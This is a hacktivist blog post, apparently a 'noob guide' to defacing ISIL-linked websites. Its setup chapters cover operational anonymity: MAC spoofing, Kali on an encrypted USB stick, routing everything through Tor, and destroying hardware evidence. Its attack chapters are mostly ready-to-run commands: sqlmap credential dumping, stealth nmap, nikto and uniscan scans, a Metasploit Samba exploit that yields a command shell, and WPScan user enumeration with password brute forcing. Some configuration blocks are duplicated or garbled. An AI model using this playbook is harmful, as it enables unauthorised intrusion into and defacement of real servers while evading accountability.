`.:/+oyh:
`:/oyhmNNNMMMMMM-
yNNMMMMMMMMMMMMMy
.MMMMMMMMMMMMMMMN.
/MMMMMMMMMMMMMMMh
+MMMMMMMMMMMMMMMo
oMMMMMMMMMMMMMMMh .:+syhhhhhys/.
sMMMMMMMMMMMMMMMM+. `:oyys+/--.....-/o+.
sMMMMMMMMdsooosyhdhyo:` .+s/-` `..-------..``.`
oMMMMMMMMhyyyyyysso++oso:` .. `-+ydmNNNNNmmmddho-
oMMMMMMmsssyhdmNMMMMmho//+. `:ymNMMMmdyo/--....-/o+.
+MMMMMM- .-/ydNMMMNd: `dMMMmds:. `-`
/MMMMMM+ `-odMMMm `hhso+.`
/MMMMMMm` `/dMN- `/o-
-MMMMMMMh` ` `hMNo` +s` `:.
.MMMMMMMMhssssssso+/-/ysoMMMd` . `:/oosssssso+--+hm-
`MMMMdssyhmNNNNNNNNmh/hMMMMMMs odmNNNNNNNNdhsoymh-
NMM+ `.....`:+:yMMMMMMd `.....` `+/`
mMd .. sMMMMMMN .
dMs `mMMMMMMM
yM+ `yMMMMMMMN
oM+ .dMMMMMMMMm
/M+ `mMMMMMMMMMy
-My yMMMMMMMMMM: ``
`MN. `/dMMMMMMMMMMm `oy:`
mMh//+///+oydy+-..:odMMMMMm. `-:. `/yyso+//+o+/`
oMd` .dMMMMy. .+dMMMNo-.:+o+++: ``oNm+mh`
`NMs -M/dMm/` `-mMMMNNMMm: `/dMy./N-
+MMo hy`sMMmo- .+dMMMMhdMMMNh/` `-omMN+ .ms
sMM+ .m+ :hMMNmyoosdNMMMMNo``sMMMMMmhsosymNMNy. .dd`
`sMN+ :N+ `-oyddmmNNNNNms. :ydmNNNNmmddy+. .dd.
+NMo :mo ```.:/+ossoooooo++oo++/-.``` :my`
:mMy`-dy` `````....````` +mo`
.hMd-`sd- .yh-
`+NN+`/h/ `/sddhyddhs:` :h+`
-hNy..so` `sMMNMMs` `+y.
`+mm: /s. dMMMm .s/
.yNs`.o- .NMMMN. -o.
/md-`/: yMMMMMh :/`
.sm+`-: mMMMMMN :-
:dy..` dMMMMMm ``
`+h: +MMMMMs
.o- `NMMMM-
sMMMy
`NMN.
:m:
B1tsh1fter's Legionary Noob guide to Fucking ISIL online.
https://www.youtube.com/watch?v=V1fMvLbE85E
Vol 1 Website Defacement (Just in time for fuck ISIL friday.)
####################################################################################
The term "website defacement" refers to any unauthorized changes made to the appearance of either a single webpage, or an entire site.
Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. These are typically the work
of system crackers, who break into a web server and replace the hosted website with one of their own.
1337 SETUP not for noobs
####################################################################################
Mifi access point.
https://www.verizonwireless.com/internet-devices/jetpack-mifi-6620l/ $49.99
Prepaid sim cards
http://www.ebay.com/sch/Verizon-SIM-Cards/29778/bn_591704/i.html
https://www.youtube.com/watch?v=RyzKNMQB3OQ
Fake Name generator
https://fakena.me/fake-name/
DAVIS STANDARD WIRELESS REPEATER SOLAR POWERED $200.00
https://jet.com/product/detail/ca20e31f9fb34add9071c2b1d21c7575
Turn do not broadcast ssid, just type it in at client.
SETUP
####################################################################################
Set random mac address first, before connecting to wifi.
MAC Address Changer for windoze
https://technitium.com/tmac/
Download the the lastest version of the Kali linux .iso from a free wifi access point & burn on laptop/computer.
https://www.kali.org/downloads/
Boot from dvd drive;
Install onto 16GB usb drive
(warning do not use "USB persistence" this is diffrent, just install on to the USB drive using Kali graphic install.)
On This drive;
CORSAIR Padlock 2 16GB USB 2.0 Flash Drive AES Hardware-based encryption $29.99
http://www.newegg.com/Product/Product.aspx?Item=N82E16820233128
Also use LVM encryption in the Kali graphic install options.
The OS is now dual, numberpad AES hardware encrypted & password AES LVM encrypted.
When the drive is removed it leaves no trace on the computer.
Destroy original Kali install disk with by cooking microwave for 3 min,
shatter into pieces and dump in unmarked dumpster at least 5 blocks from residence (wear thick rubber gloves).
Set BIOS too boot from the USB drive and away we go.
IN CASE OF EMERGANCY!!
Microwave USB drive for 5 min!! This will destroy the internal NAND chip and all data with it.
Kali boots with "root" user enabled by default, this is insecure we must change this.
Enter into the following into the terminal;
sudo adduser an0n
Then enter password, leave info blank.
Add user to the sudoers list;
Enter into the following into the terminal;
sudo usermod -a -G sudo an0n
Disable root account,
Enter into the following into the terminal;
sudo passwd -l root
# Ignore ICMP broadcast requests
net.ipv4.icmp_echo_ignore_broadcasts = 1
# Disable source packet routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv6.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
net.ipv6.conf.default.accept_source_route = 0
# Ignore send redirects
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
# Block SYN attacks
net.ipv4.tcp_max_syn_backlog = 2048
net.ipv4.tcp_synack_retries = 2
net.ipv4.tcp_syn_retries = 5
# Log Martians
net.ipv4.conf.all.log_martians = 1
net.ipv4.icmp_ignore_bogus_error_responses = 1
# Ignore ICMP redirects
net.ipv4.conf.all.accept_redirects = 0
net.ipv6.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv6.conf.default.accept_redirects = 0
# Ignore Directed pings
net.ipv4.icmp_echo_ignore_all = 1
Chapter 1 Anonymity or "No shit sherlock":
####################################################################################
For this chapter Login too a free wifi access point if possible.
Install macchanger,
Enter into the following into the terminal;
sudo apt-get update && sudo apt-get install macchanger
sudo apt-get install net-tools
ifconfig
sudo touch Desktop/MAC.sh && sudo chmod 777 MAC.sh
sudo nano Desktop/MAC.sh
!#/bin/bash
sudo ifconfig enp2s0 down && sudo macchanger -r enp2s0 && sudo ifconfig enp2s0 up
sudo nano Desktop/MAC.sh
!#/bin/bash
sudo ifconfig enp2s0 down && sudo macchanger -r enp2s0 && sudo ifconfig enp2s0 up
Fuck VPN's they lie, can get compromised and/or subpoena
tunnel ALL through tor with the following config:
Enter into the following into the terminal;
sudo apt-get install tor && sudo apt-get install firehol &&
sudo nano /etc/default/firehol
modify the following in the file too START_FIREHOL=YES
sudo apt-get install tor
TOR config
edit the following to
sudo nano /etc/tor/torrc
Very Important!!: Must run the following command on each boot without fail;
sudo ifconfig eth0 down && sudo macchanger -r eth0 && sudo ifconfig eth0 up
Fuck VPN's they lie, can get compromised and/or subpoena
tunnel ALL through tor with the following config:
Enter into the following into the terminal;
sudo apt-get install tor && sudo apt-get install firehol &&
sudo nano /etc/default/firehol
modify the following in the file too START_FIREHOL=YES
TOR config
edit the following to
sudo nano /etc/tor/torrc
to this:
####start below here####
VirtualAddrNetworkIPv4 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 53
FascistFirewall 1
FirewallPorts 443
DataDirectory /var/lib/tor
PidFile /var/run/tor/tor.pid
User debian-tor
ClientOnly
ExitNodes {us}
####end above here#####
Firehol config
sudo nano /etc/firehol/firehol.conf
to this:
####start below here####
version 5
server_tor_ports="tcp/9050 tcp/9051"
client_tor_ports="default"
server_proxy_ports="tcp/9040"
lient_tor_ports="default"
server_proxy_ports="tcp/9040"
client_proxy_ports="default"
server_polipo_ports="tcp/8118"
client_polipo_ports="default"
server_dns_ports="udp/53"
client_dns_ports="default"
#all incoming DNS goes to port 53 or whatever your torrc's DNSPort is
#for local redirection make sure your /etc/resolv.conf reads 'nameserver #127.0.0.1
redirect to 53 inface eth+ proto udp src 192.168.0.0/16 dst not 127.0.0.1 dport 53
#add to force all incoming tcp traffic to 9040
#for some reason this will redirect locally generated tcp traffic too
transparent_proxy "1:65535" 9040 debian-tor inface eth+ user not debian-tor dst not "$UNROUTABLE_IPS"
interface eth0 dhcp
policy return
client dhcp accept
client all accept
#allow only outgoing TOR traffic
interface eth0 internet src not "$UNROUTABLE_IPS"
client all accept user debian-tor
#add for local DNS and proxy access
interface "eth0 lo" local src "192.168.1.2 127.0.0.1" dst "192.168.1.2 127.0.0.1"
server dns accept
server privoxy accept
server tor accept
server proxy accept
#add for local TOR socks and control port access
interface lo internal src 127.0.0.1 dst 127.0.0.1
server tor accept
server proxy accept
####end above here#####
Remove icewesel and install firefox
Enter the following into the terminal;
apt-get remove iceweasel &&
echo -e “\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main” | tee -a /etc/apt/sources.list > /dev/null &&
apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29 &&
apt-get update &&
apt-get install firefox-mozilla-build
Firefox plugins to install;
https://addons.mozilla.org/en-US/firefox/addon/cookie-whitelist-with-buttons/
https://addons.mozilla.org/en-US/firefox/addon/sslpersonas/
https://addons.mozilla.org/en-US/firefox/addon/ghostery/
https://addons.mozilla.org/en-US/firefox/addon/smart-https/
https://addons.mozilla.org/en-US/firefox/addon/noscript/
https://addons.mozilla.org/en-US/firefox/addon/random-agent-spoofer/
https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/
https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
configure foxyproxy to use tor at 127.0.0.1 9050 socks 4a
Install proxychains to stay stealth
Enter the following into the terminal;
sudo apt-get install proxychains
Chapter 2 Target Acquired or "How 1337 am I?"
####################################################################################
Enter the following into the terminal;
sudo proxychains nslookup www.Jihadist.ps
####output start####
Server: 8.8.8.8
Address: 8.8.8.8#53
Non-authoritative answer:
www.Jihadist.ps canonical name = Jihadist.ps.
Name: Jihadist.ps
Address: 104.28.##.105
Name: Jihadist.ps
Address: 104.28.##.105
####output end####
run sqlmap over tor with random user agent at target page for usernames and passwords;
Enter the following into the terminal;
sudo sqlmap --tor --random-agent -a --url=http://forums.Jihadist.ps
run nmap in a separate terminal while we wait for the results
Scan the ip with nmap + proxychains to route it over tor
set to zero ping "-Pn" to avoid detection The
-Ss option tells nmap to perform a stealth scan, the -A option tells it to try to discover OS;
Enter the following into the terminal;
sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105
Scan the site with nikto + proxychains to route it over tor;
Enter the following into the terminal;
sudo proxychains nikto -h www.Jihadist.ps && proxychains nikto -h 104.28.##.105
Scan the site with uniscan + proxychains to route it over tor;
Enter the following into the terminal;
sudo proxychains ./uniscan -u https://www.Jihadist.ps/
The following info should have been obtained with the help of the tor cloaked scanning
Target ip (from nslookup) 104.28.##.105
Target OS and Version from nmap.
kick it oldschool by googling "OS version Exploit Metasploit" to check for any quick exploit modules in Metasploit.
We need to find out the OS and ports and services running on the target system.
EXAMPLE;
Once you find the open ports and service like a samba port its party time.
Fire up Metasploit!
Enter the following into the terminal;
msfconsole
Enter the follow into the Metasploit framework console;
msf >set Proxies socks5:127.0.0.1:9050
We need to find the version of samba..
Enter each into the follow into the Metasploit framework console;
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) >set RHOST 104.28.##.105
RHOST => 104.28.##.105
msfauxiliary(smb_version) >set RPORT 445
RPORT => 445
msfauxiliary(smb_version) >exploit
With version in hand, restart msfconsole now we use the appropriate module...
msfconsole
msf >set Proxies socks5:127.0.0.1:9050
msf >use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 104.28.##.105
msf exploit(usermap_script) >exploit
We now have a command shell on the target box!
Chapter 3 Other methods of infiltration or "Boba fett is dead!"
####################################################################################
If using Wordpress; (Credit to Dr Chaos);
wpscan –-url wordpress_url
You should be able to quickly determine the WordPress version, which plugins are installed, and what theme is active when you open the scanner.
The first thing we will do is look for lines beginning with a red plus (+). These are the known WordPress vulnerabilities.
If the correct vulnerability exists, you can enumerate a user list from WordPress with the following command:
wpscan –-url wordpress_url –-enumerate u
Once user names have been collected, you then can attempt to brute force crack the associated passwords.
You can also download our custom word list from here: /usr/share/wordlists
WARNING: DO A SAVE AS OR YOUR BROWSER MAY CRASH
wget http://www.drchaos.com/public_files/chaos-dictionary.lst.txt
Brute force the following command:
wpscan –-url [wordpress_url] –-word list [path_to_world list] –-username [username to bruteforce] –threads [number of threads]
The result? If you are lucky, you can see WPScan was able to crack the password.
To be continued...
What does the Fawkes say?
No comments:
Post a Comment